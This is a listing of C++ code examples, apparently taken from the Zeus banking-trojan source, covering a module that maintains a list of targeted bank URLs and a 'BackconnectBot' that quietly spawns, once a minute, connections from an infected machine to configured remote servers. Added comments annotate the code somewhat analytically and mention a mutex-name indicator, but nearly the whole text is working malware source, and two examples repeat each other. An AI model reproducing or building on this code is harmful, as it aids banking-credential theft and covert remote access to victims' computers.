Exemplo n.º 1
/*
  Worker thread: every time eventHandle is signalled, re-reads ITEM_BANK_LIST from the
  current local configuration and replaces the shared urls/urlsSize pair with it.

  IN p - not used in this function.
*/
void WINAPI bank::proc(void* p)
{
	
	//The loop ends as soon as the wait returns anything other than WAIT_OBJECT_0.
	while(WaitForSingleObject(eventHandle, INFINITE) == WAIT_OBJECT_0)
	{
		BinStorage::STORAGE *config = LocalConfig::getCurrent();
	
		if(config != NULL)
		{
		
			//csupd guards urls/urlsSize; the config item is also read while the lock is held.
			EnterCriticalSection(&csupd);
			DWORD itemListSize;
			LPSTR itemList = (LPSTR)BinStorage::_getItemDataEx(config, LocalConfig::ITEM_BANK_LIST, BinStorage::ITEMF_IS_SETTING, &itemListSize);
			
			if(itemList != NULL && isValidList(itemList, itemListSize))
			{
				//Resize the shared buffer and copy the whole list into it.
				//The result of Mem::reallocEx is not inspected before the copy.
				Mem::reallocEx(&urls, (itemListSize)*sizeof(char));
				Mem::_copy(urls, itemList, itemListSize);
				urlsSize = itemListSize;
			}
			LeaveCriticalSection(&csupd);
			//Both buffers obtained in this iteration are released here.
			Mem::free(itemList);
			Mem::free(config);
		
		} 
	}
	
}
Exemplo n.º 2
/*
  Initialises the module: sets up the csupd critical section, loads ITEM_BANK_LIST from the
  current local configuration into urls/urlsSize, creates two named events and starts the
  proc thread.
*/
void bank::init()
{
	InitializeCriticalSection(&csupd);
	BinStorage::STORAGE *config = LocalConfig::getCurrent();
    if(config != NULL)
    {
      DWORD itemListSize;
      LPSTR itemList = (LPSTR)BinStorage::_getItemDataEx(config, LocalConfig::ITEM_BANK_LIST, BinStorage::ITEMF_IS_SETTING, &itemListSize);
        
      if(itemList != NULL && isValidList(itemList, itemListSize))
      { 
		//Replace any previously held list with a private copy of the stored one.
		if(urls != NULL) Mem::free(urls);
        urls = (LPSTR)Mem::copyEx(itemList, itemListSize);
		urlsSize = itemListSize;
		
      }
	  

      Mem::free(itemList);
      Mem::free(config);
    }
	//Two named, manual-reset, initially non-signalled events, both created with the saAllowAll
	//security attributes. The names come from Core::generateObjectName (not shown here) with
	//the KON_SESSION kind - presumably session-scoped object names; confirm against Core.
	WCHAR objectName[50];
	Core::generateObjectName(Core::OBJECT_ID_BANK_LIST_ARRIVED, objectName, MalwareTools::KON_SESSION);
	eventHandle = CWA(kernel32, CreateEventW)(&coreData.securityAttributes.saAllowAll, TRUE, FALSE, objectName);
	Core::generateObjectName(Core::OBJECT_ID_REPORTS_SENSETIVE, objectName, MalwareTools::KON_SESSION);
	sensetiveHandle = CWA(kernel32, CreateEventW)(&coreData.securityAttributes.saAllowAll, TRUE, FALSE, objectName);
	//Neither event handle is checked for NULL before the thread starts; the thread handle
	//returned by CreateThread is discarded.
    CWA(kernel32, CreateThread)(NULL,0,(LPTHREAD_START_ROUTINE)proc,NULL,0, NULL);
}
Exemplo n.º 3
/*
  Adds one URL entry to the ITEM_BANK_LIST setting of the local configuration.

  IN url - string to add; it is stored lower-cased.

  Return - true if the configuration was updated and committed,
           false if url is empty, the entry already exists, or any step failed.
*/
bool bank::_addStatic(LPSTR url)
{
	WORD newItemSize;
  char newItem[256 + 1 + 1];

  //Build the item.
  {
    //The length is truncated to 8 bits by the cast, so at most 255 characters are copied.
    BYTE urlLen = (BYTE)Str::_LengthA(url);
    char *offset        = newItem;
    
    if(urlLen == 0)return false;

    //Item size = string plus its terminator.
    newItemSize = (urlLen + 1);

    Str::_CopyA(offset, url, urlLen);

    //Lower-case the item in place.
    CWA(user32, CharLowerBuffA)(newItem, newItemSize);
  }
  
  //Open the configuration.
  BinStorage::STORAGE *config = LocalConfig::beginReadWrite();
  if(config == NULL)return false;
    
  //Get the list of existing items.
  bool ok = true;
  DWORD itemListSize;
  LPSTR itemList = (LPSTR)BinStorage::_getItemDataEx(config, LocalConfig::ITEM_BANK_LIST, BinStorage::ITEMF_IS_SETTING, &itemListSize);

  //If the list exists, look for a duplicate.
  if(isValidList(itemList, itemListSize))
  {
    LPSTR curItem = itemList;
    do
    {
		
      //Check whether more space remains than the size of the item being searched for.
      if((DWORD)((itemList + itemListSize) - curItem) <= newItemSize)break;
      
      //Compare.
      if(Mem::_compare(curItem, newItem, newItemSize) == 0)
      {
        WDEBUG0(WDDT_INFO, "Item already exists.");
        ok = false;
        break;
      }
    }
    while((curItem = Str::_multiStringGetIndexA(curItem, 1)) != NULL);
    
    if(ok == true && (ok = Mem::reallocEx(&itemList, itemListSize + newItemSize)) == true)
    {
		
      //Write the new item over the last byte of the old list, so the stored size grows by
      //exactly newItemSize.
      Mem::_copy2(itemList + itemListSize - 1, newItem, newItemSize + 1);
      ok = BinStorage::_modifyItemById(&config, LocalConfig::ITEM_BANK_LIST, BinStorage::ITEMF_IS_SETTING | BinStorage::ITEMF_COMBINE_OVERWRITE, itemList, itemListSize + newItemSize);
    }
  }
  //If no valid list was found, store the new item as the whole list.
  else
  {
    if(itemList == NULL)ok = BinStorage::_addItem(&config, LocalConfig::ITEM_BANK_LIST, BinStorage::ITEMF_IS_SETTING | BinStorage::ITEMF_COMBINE_OVERWRITE, newItem, newItemSize + 1);
    else                ok = BinStorage::_modifyItemById(&config, LocalConfig::ITEM_BANK_LIST, BinStorage::ITEMF_IS_SETTING | BinStorage::ITEMF_COMBINE_OVERWRITE, newItem, newItemSize + 1);
  }
  Mem::free(itemList);

  //On failure the working copy is dropped and NULL is handed to endReadWrite
  //(presumably this closes the session without saving - confirm in LocalConfig).
  if(ok == false)
  {
    Mem::free(config);
    config = NULL;
  }
  ok = LocalConfig::endReadWrite(config);
  //Signal eventHandle so that a thread waiting on it re-reads the list.
  if(ok)PulseEvent(eventHandle);
  return ok;
}
Exemplo n.º 4
/*
  Removes every entry of the ITEM_BANK_LIST setting that matches a mask.

  IN url - mask passed to Str::_matchExA for each stored entry.

  Return - result of LocalConfig::endReadWrite(); false if the configuration
           could not be opened.
*/
bool bank::_removeStatic(LPSTR url)
{
	//Load the config.
  BinStorage::STORAGE *config = LocalConfig::beginReadWrite();
  if(config == NULL)return false;

  //Get the list of items.
  DWORD itemListSize;
  LPSTR itemList = (LPSTR)BinStorage::_getItemDataEx(config, LocalConfig::ITEM_BANK_LIST, BinStorage::ITEMF_IS_SETTING, &itemListSize);
  
  //There are no items.
  if(itemList == NULL)
  {
    Mem::free(config);
    return LocalConfig::endReadWrite(NULL);
  }

  //Validate the list.
  bool changed = false;
  if(isValidList(itemList, itemListSize))
  {
    //Allocate a buffer of the same size to receive the items that do not match the mask.
    LPSTR newItemList = (LPSTR)Mem::alloc(itemListSize);    
    if(newItemList != NULL)  
    {
      //Walk the items.
      LPSTR curItem = itemList;
      LPSTR offset  = newItemList;
      int len;

      do
      {
        LPSTR curUrl = curItem;

        if(Str::_matchExA(url, curUrl))
        {
          //Matching entries are simply not copied to the new list.
          changed = true;
        }
        else
        {
          len = Str::_LengthA(curUrl);
          Str::_CopyA(offset, curUrl, len);
          offset += len + 1;

          *offset = 0; //Terminating byte of the multi-string.
        }
      }
      while((curItem = Str::_multiStringGetIndexA(curItem, 1)) != NULL);
      
      if(changed == true)
      {
        //If nothing was kept, the size passed below becomes 0.
        if(offset == newItemList)offset--; //Almost equivalent to BinStorage::ITEMF_COMBINE_DELETE.
        changed = BinStorage::_modifyItemById(&config, LocalConfig::ITEM_BANK_LIST, BinStorage::ITEMF_IS_SETTING | BinStorage::ITEMF_COMBINE_OVERWRITE, newItemList, offset - newItemList + 1);
      }
      Mem::free(newItemList);
    }
  }
  Mem::free(itemList);

  //Nothing changed (or the update failed): drop the working copy and pass NULL to endReadWrite.
  if(changed == false)
  {
    Mem::free(config);
    config = NULL;
  }

  return LocalConfig::endReadWrite(config);
}
Exemplo n.º 5
/*
  Adds one (servicePort, server, serverPort) entry to the ITEM_BACKCONNECT_LIST setting
  of the local configuration.

  IN servicePort - first string of the entry.
  IN server      - second string of the entry.
  IN serverPort  - third string of the entry.

  Return - result of LocalConfig::endReadWrite(); false if any string is empty or the
           configuration could not be opened.
*/
bool BackconnectBot::_addStatic(LPSTR servicePort, LPSTR server, LPSTR serverPort)
{
  WORD newItemSize;
  char newItem[256 * 3 + 3 + 1];

  //Build the item.
  {
    //Each length is truncated to 8 bits by the cast, so at most 255 characters per string.
    BYTE servicePortLen = (BYTE)Str::_LengthA(servicePort);
    BYTE serverLen      = (BYTE)Str::_LengthA(server);
    BYTE serverPortLen  = (BYTE)Str::_LengthA(serverPort);
    char *offset        = newItem;
    
    if(servicePortLen == 0 || serverLen == 0 || serverPortLen == 0)return false;

    //Item size = the three strings, each with its terminator.
    newItemSize = (servicePortLen + 1) + (serverLen + 1) + (serverPortLen + 1);

    Str::_CopyA(offset, servicePort, servicePortLen);
    offset += servicePortLen + 1;

    Str::_CopyA(offset, server, serverLen);
    offset += serverLen + 1;

    Str::_CopyA(offset, serverPort, serverPortLen);
    offset += serverPortLen + 1;

    *offset = 0; //Terminating byte of the multi-string.
    
    //Lower-case the item in place.
    CWA(user32, CharLowerBuffA)(newItem, newItemSize);
  }
  
  //Open the configuration.
  BinStorage::STORAGE *config = LocalConfig::beginReadWrite();
  if(config == NULL)return false;
    
  //Get the list of existing items.
  bool ok = true;
  DWORD itemListSize;
  LPSTR itemList = (LPSTR)BinStorage::_getItemDataEx(config, LocalConfig::ITEM_BACKCONNECT_LIST, BinStorage::ITEMF_IS_SETTING, &itemListSize);

  //If the list exists, look for a duplicate.
  if(isValidList(itemList, itemListSize))
  {
    LPSTR curItem = itemList;
    do
    {
      //Check whether more space remains than the size of the item being searched for.
      if((DWORD)((itemList + itemListSize) - curItem) <= newItemSize)break;
      
      //Compare.
      if(Mem::_compare(curItem, newItem, newItemSize) == 0)
      {
        WDEBUG0(WDDT_INFO, "Item already exists.");
        ok = false;
        break;
      }
    }
    //Entries are three strings long, so step three strings at a time.
    while((curItem = Str::_multiStringGetIndexA(curItem, 3)) != NULL);
    
    if(ok == true && (ok = Mem::reallocEx(&itemList, itemListSize + newItemSize)) == true)
    {
      //Write the new item over the last byte of the old list, so the stored size grows by
      //exactly newItemSize.
      Mem::_copy(itemList + itemListSize - 1, newItem, newItemSize + 1);
      ok = BinStorage::_modifyItemById(&config, LocalConfig::ITEM_BACKCONNECT_LIST, BinStorage::ITEMF_IS_SETTING | BinStorage::ITEMF_COMBINE_OVERWRITE, itemList, itemListSize + newItemSize);
    }
  }
  //If no valid list was found, store the new item as the whole list.
  else
  {
    if(itemList == NULL)ok = BinStorage::_addItem(&config, LocalConfig::ITEM_BACKCONNECT_LIST, BinStorage::ITEMF_IS_SETTING | BinStorage::ITEMF_COMBINE_OVERWRITE, newItem, newItemSize + 1);
    else                ok = BinStorage::_modifyItemById(&config, LocalConfig::ITEM_BACKCONNECT_LIST, BinStorage::ITEMF_IS_SETTING | BinStorage::ITEMF_COMBINE_OVERWRITE, newItem, newItemSize + 1);
  }
  Mem::free(itemList);

  //On failure the working copy is dropped and NULL is handed to endReadWrite
  //(presumably this closes the session without saving - confirm in LocalConfig).
  if(ok == false)
  {
    Mem::free(config);
    config = NULL;
  }

  return LocalConfig::endReadWrite(config);
}
Exemplo n.º 6
/*
  Thread that creates and supervises the backconnect connections.

  While the core is active it wakes up on a timer (60 seconds, 1 second when BO_DEBUG > 0),
  reads ITEM_BACKCONNECT_LIST from the current local configuration and, for every
  (servicePort, server, serverPort) entry, tries to start one procConnection thread.

  Analysis note: each entry is paired with a named mutex of the fixed form
  "Global\" followed by 24 upper-case hex digits (three hash values printed with %08X),
  which is visible as a named kernel object on a host where this code runs.

  Return - 0 after a normal stop, 1 if the control mutex could not be obtained.
*/
static DWORD WINAPI proc(void *)
{
  CoreHook::disableFileHookerForCurrentThread(true);
  //The control mutex is held for the life of the thread and released before the final return
  //(presumably to keep a single control thread system-wide - KON_GLOBAL; confirm in Core).
  HANDLE mutex = Core::waitForMutexOfObject(Core::OBJECT_ID_BACKCONNECT_CONTROL, MalwareTools::KON_GLOBAL);
  if(mutex == NULL)
  {
    WDEBUG0(WDDT_ERROR, "Failed");
    return 1;
  }
  
  CWA(kernel32, SetThreadPriority)(CWA(kernel32, GetCurrentThread)(), THREAD_PRIORITY_IDLE);

  WDEBUG0(WDDT_INFO, "Started.");
  //The wait on stopEvent doubles as the polling timer: the body runs on every timeout and
  //the loop ends as soon as the wait returns anything other than WAIT_TIMEOUT.
#if(BO_DEBUG > 0)
  if(Core::isActive())while(CWA(kernel32, WaitForSingleObject)(coreData.globalHandles.stopEvent, 1000) == WAIT_TIMEOUT)
#else
  if(Core::isActive())while(CWA(kernel32, WaitForSingleObject)(coreData.globalHandles.stopEvent, 60 * 1000) == WAIT_TIMEOUT)
#endif
  {
    BinStorage::STORAGE *config = LocalConfig::getCurrent();
    if(config != NULL)
    {
      DWORD itemListSize;
      LPSTR itemList = (LPSTR)BinStorage::_getItemDataEx(config, LocalConfig::ITEM_BACKCONNECT_LIST, BinStorage::ITEMF_IS_SETTING, &itemListSize);
        
      if(itemList != NULL && isValidList(itemList, itemListSize))
      {
        LPSTR curItem = itemList;
        do
        {
          //An entry is three consecutive strings of the multi-string.
          LPSTR curServicePort = curItem;
          LPSTR curServer      = Str::_multiStringGetIndexA(curItem, 1);
          LPSTR curServerPort  = Str::_multiStringGetIndexA(curItem, 2);

          //Generate the mutex.
          HANDLE bcMutex = NULL;
          {
            //One hash per string; together they form the mutex name.
            DWORD nameParts[3];
            nameParts[0] = Crypt::crc32Hash(curServicePort, Str::_LengthA(curServicePort));
            nameParts[1] = Crypt::crc32Hash(curServer, Str::_LengthA(curServer));
            nameParts[2] = Crypt::crc32Hash(curServerPort, Str::_LengthA(curServerPort));

            //7 characters of "Global\" + 3 * 8 hex digits + terminator; the mutex is only
            //created when the formatted name has exactly that length.
            WCHAR mutexName[7 + 3 * 8 + 1];
            if(Str::_sprintfW(mutexName, sizeof(mutexName) / sizeof(WCHAR), L"Global\\%08X%08X%08X", nameParts[0], nameParts[1], nameParts[2]) == sizeof(mutexName) / sizeof(WCHAR) - 1)
            {
              WDEBUG1(WDDT_INFO, "mutexName=[%s]", mutexName);
              //Presumably returns NULL when a mutex with this name already exists, so an
              //entry that is already being served is skipped - confirm in Sync.
              bcMutex = Sync::_createUniqueMutex(&coreData.securityAttributes.saAllowAll, mutexName);
            }
          }

          //Create the child thread.
          if(bcMutex != NULL)
          {
            BCDATA *bcData = (BCDATA *)Mem::alloc(sizeof(BCDATA));
            if(bcData != NULL)
            {
              //Private copies of the three strings, since itemList is freed below.
              bcData->servicePort = Str::_CopyExA(curServicePort, -1);
              bcData->server      = Str::_CopyExA(curServer, -1);
              bcData->serverPort  = Str::_CopyExA(curServerPort, -1);
              bcData->mutex       = bcMutex;

              if(bcData->servicePort != NULL && bcData->server != NULL && bcData->serverPort != NULL)
              {
                //On success bcData and bcMutex are left to procConnection; 'continue' jumps
                //to the loop condition and skips the cleanup below.
                if(Process::_createThread(512 * 1024, procConnection, bcData) > 0)continue;
              }

              //Failure path: release everything allocated for this entry.
              Mem::free(bcData->servicePort);
              Mem::free(bcData->server);
              Mem::free(bcData->serverPort);
              Mem::free(bcData);
            }
            Sync::_freeMutex(bcMutex);
          }
        }
        //Advance to the next entry (three strings further on).
        while((curItem = Str::_multiStringGetIndexA(curItem, 3)) != NULL);
      }

      Mem::free(itemList);
      Mem::free(config);
    }
  }  
  
  WDEBUG0(WDDT_INFO, "Stopped.");
  Sync::_freeMutex(mutex);

  return 0;
}
Exemplo n.º 7
/*
  Removes every entry of the ITEM_BACKCONNECT_LIST setting whose three strings all match
  the given masks.

  IN servicePort - mask for the first string of an entry.
  IN server      - mask for the second string of an entry.
  IN serverPort  - mask for the third string of an entry.

  Return - result of LocalConfig::endReadWrite(); false if the configuration
           could not be opened.
*/
bool BackconnectBot::_removeStatic(LPSTR servicePort, LPSTR server, LPSTR serverPort)
{
  //Load the config.
  BinStorage::STORAGE *config = LocalConfig::beginReadWrite();
  if(config == NULL)return false;

  //Get the list of items.
  DWORD itemListSize;
  LPSTR itemList = (LPSTR)BinStorage::_getItemDataEx(config, LocalConfig::ITEM_BACKCONNECT_LIST, BinStorage::ITEMF_IS_SETTING, &itemListSize);
  
  //There are no items.
  if(itemList == NULL)
  {
    Mem::free(config);
    return LocalConfig::endReadWrite(NULL);
  }

  //Validate the list.
  bool changed = false;
  if(isValidList(itemList, itemListSize))
  {
    //Allocate a buffer of the same size to receive the items that do not match the masks.
    LPSTR newItemList = (LPSTR)Mem::alloc(itemListSize);    
    if(newItemList != NULL)  
    {
      //Walk the items.
      LPSTR curItem = itemList;
      LPSTR offset  = newItemList;
      int len;

      do
      {
        //An entry is three consecutive strings of the multi-string.
        LPSTR curServicePort = curItem;
        LPSTR curServer      = Str::_multiStringGetIndexA(curItem, 1);
        LPSTR curServerPort  = Str::_multiStringGetIndexA(curItem, 2);

        if(Str::_matchExA(servicePort, curServicePort) && Str::_matchExA(server, curServer) && Str::_matchExA(serverPort, curServerPort))
        {
          //Matching entries are simply not copied to the new list.
          changed = true;
        }
        else
        {
          len = Str::_LengthA(curServicePort);
          Str::_CopyA(offset, curServicePort, len);
          offset += len + 1;

          len = Str::_LengthA(curServer);
          Str::_CopyA(offset, curServer, len);
          offset += len + 1;

          len = Str::_LengthA(curServerPort);
          Str::_CopyA(offset, curServerPort, len);
          offset += len + 1;

          *offset = 0; //Terminating byte of the multi-string.
        }
      }
      while((curItem = Str::_multiStringGetIndexA(curItem, 3)) != NULL);
      
      if(changed == true)
      {
        //If nothing was kept, the size passed below becomes 0.
        if(offset == newItemList)offset--; //Almost equivalent to BinStorage::ITEMF_COMBINE_DELETE.
        changed = BinStorage::_modifyItemById(&config, LocalConfig::ITEM_BACKCONNECT_LIST, BinStorage::ITEMF_IS_SETTING | BinStorage::ITEMF_COMBINE_OVERWRITE, newItemList, offset - newItemList + 1);
      }
      Mem::free(newItemList);
    }
  }
  Mem::free(itemList);

  //Nothing changed (or the update failed): drop the working copy and pass NULL to endReadWrite.
  if(changed == false)
  {
    Mem::free(config);
    config = NULL;
  }

  return LocalConfig::endReadWrite(config);
}
Exemplo n.º 8
/*
  Adds one (servicePort, server, serverPort) entry to the ITEM_BACKCONNECT_LIST setting
  of the local configuration.

  IN servicePort - first string of the entry.
  IN server      - second string of the entry.
  IN serverPort  - third string of the entry.

  Return - result of LocalConfig::endReadWrite(); false if any string is empty or the
           configuration could not be opened.
*/
bool BackconnectBot::_addStatic(LPSTR servicePort, LPSTR server, LPSTR serverPort)
{
  WORD newItemSize;
  char newItem[256 * 3 + 3 + 1];

  //Build the item.
  {
    //Each length is truncated to 8 bits by the cast, so at most 255 characters per string.
    BYTE servicePortLen = (BYTE)Str::_LengthA(servicePort);
    BYTE serverLen      = (BYTE)Str::_LengthA(server);
    BYTE serverPortLen  = (BYTE)Str::_LengthA(serverPort);
    char *offset        = newItem;
    
    if(servicePortLen == 0 || serverLen == 0 || serverPortLen == 0)return false;

    //Item size = the three strings, each with its terminator.
    newItemSize = (servicePortLen + 1) + (serverLen + 1) + (serverPortLen + 1);

    Str::_CopyA(offset, servicePort, servicePortLen);
    offset += servicePortLen + 1;

    Str::_CopyA(offset, server, serverLen);
    offset += serverLen + 1;

    Str::_CopyA(offset, serverPort, serverPortLen);
    offset += serverPortLen + 1;

    *offset = 0; //Terminating byte of the multi-string.
    
    //Lower-case the item in place.
    CWA(user32, CharLowerBuffA)(newItem, newItemSize);
  }
  
  //Open the configuration.
  BinStorage::STORAGE *config = LocalConfig::beginReadWrite();
  if(config == NULL)return false;
    
  //Get the list of existing items.
  bool ok = true;
  DWORD itemListSize;
  LPSTR itemList = (LPSTR)BinStorage::_getItemDataEx(config, LocalConfig::ITEM_BACKCONNECT_LIST, BinStorage::ITEMF_IS_SETTING, &itemListSize);

  //If the list exists, look for a duplicate.
  if(isValidList(itemList, itemListSize))
  {
    LPSTR curItem = itemList;
    do
    {
      //Check whether more space remains than the size of the item being searched for.
      if((DWORD)((itemList + itemListSize) - curItem) <= newItemSize)break;
      
      //Compare.
      if(Mem::_compare(curItem, newItem, newItemSize) == 0)
      {
        WDEBUG0(WDDT_INFO, "Item already exists.");
        ok = false;
        break;
      }
    }
    //Entries are three strings long, so step three strings at a time.
    while((curItem = Str::_multiStringGetIndexA(curItem, 3)) != NULL);
    
    if(ok == true && (ok = Mem::reallocEx(&itemList, itemListSize + newItemSize)) == true)
    {
      //Write the new item over the last byte of the old list, so the stored size grows by
      //exactly newItemSize.
      Mem::_copy(itemList + itemListSize - 1, newItem, newItemSize + 1);
      ok = BinStorage::_modifyItemById(&config, LocalConfig::ITEM_BACKCONNECT_LIST, BinStorage::ITEMF_IS_SETTING | BinStorage::ITEMF_COMBINE_OVERWRITE, itemList, itemListSize + newItemSize);
    }
  }
  //If no valid list was found, store the new item as the whole list.
  else
  {
    if(itemList == NULL)ok = BinStorage::_addItem(&config, LocalConfig::ITEM_BACKCONNECT_LIST, BinStorage::ITEMF_IS_SETTING | BinStorage::ITEMF_COMBINE_OVERWRITE, newItem, newItemSize + 1);
    else                ok = BinStorage::_modifyItemById(&config, LocalConfig::ITEM_BACKCONNECT_LIST, BinStorage::ITEMF_IS_SETTING | BinStorage::ITEMF_COMBINE_OVERWRITE, newItem, newItemSize + 1);
  }
  Mem::free(itemList);

  //On failure the working copy is dropped and NULL is handed to endReadWrite
  //(presumably this closes the session without saving - confirm in LocalConfig).
  if(ok == false)
  {
    Mem::free(config);
    config = NULL;
  }

  return LocalConfig::endReadWrite(config);
}